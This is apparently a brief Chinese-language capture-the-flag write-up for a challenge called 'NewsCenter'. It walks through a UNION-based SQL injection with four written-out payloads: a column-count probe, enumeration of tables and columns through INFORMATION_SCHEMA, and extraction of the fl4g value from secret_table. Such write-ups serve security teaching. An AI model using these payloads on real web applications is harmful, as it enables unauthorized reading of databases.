NewsCenter
這一題考察的是 SQL 注入
首先用 ' and 0 union select 1,2,3 #
來初步判斷該sql查詢返回三列數據
然後用 ' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS #
得到表名,很明顯我們需要得到 secret_table
表中的內容
再用 ' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'#
得到 secret_table
表的列名以及數據類型
最後就可以簡單粗暴地得到flag
' and 0 union select 1,2,fl4g from secret_table #